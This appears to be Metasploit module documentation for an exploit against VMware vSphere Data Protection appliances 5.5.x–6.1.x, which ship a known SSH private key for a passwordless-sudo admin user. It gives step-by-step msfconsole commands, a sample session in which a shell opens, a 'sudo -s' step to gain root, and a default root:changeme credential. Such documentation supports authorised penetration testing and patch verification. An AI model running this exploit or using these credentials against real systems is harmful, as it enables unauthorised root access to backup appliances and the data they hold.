908 B
908 B
Vulnerable Application
VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password.
Verification Steps
- Start msfconsole
- Do:
use exploit/linux/ssh/vmware_vdp_known_privkey - Do:
set rhost 1.2.3.4 - Do:
exploit - You should get a shell.
- Type:
sudo -sto become root user
Scenarios
This is a run against a known vulnerable vSphere Data Protection appliance.
msf > use exploit/linux/ssh/vmware_vdp_known_privkey
msf exploit(vmware_vdp_known_privkey) > set rhost 1.2.3.4
rhost => 1.2.3.4
msf exploit(vmware_vdp_known_privkey) > run
[+] Successful login
[*] Found shell.
[*] Command shell session 1 opened (1.2.3.5:34147 -> 1.2.3.4:22) at 2017-01-20 20:43:22 +0100
Further Information
The default account of the appliance is root:changeme